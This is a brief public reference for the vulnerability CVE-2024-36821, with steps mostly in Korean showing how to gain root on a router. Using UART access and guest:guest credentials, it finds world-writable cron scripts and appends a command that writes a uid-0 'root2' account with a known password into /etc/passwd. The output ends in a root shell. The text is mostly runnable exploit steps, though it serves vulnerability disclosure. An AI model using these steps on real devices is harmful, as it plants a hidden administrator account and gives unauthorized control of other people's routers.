
The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821
CVE-2024-36821로 등록된 취약점에 대한 최소 필수 정보를 포함한 공개 참고 자료입니다.
UART 연결을 통해 라우터에 접속합니다.
guest:guest 자격 증명을 사용하여 시스템에 로그인합니다.
find / -perm -777 -type f 2>/dev/null 명령을 사용하여 읽기-쓰기-실행 권한이 있는 파일을 찾습니다:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh 명령으로 소유자를 확인합니다.
openssl passwd Abracadabra 명령으로 비밀번호를 생성합니다.
/tmp/cron/cron.everyminute/conntrack_collector.sh 파일을 편집하여 마지막에 새로 생성된 비밀번호를 추가합니다:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
1분 기다립니다.
다음 명령으로 root2 사용자로 전환합니다:
/ $ su root2
Password: Abracadabra
~ #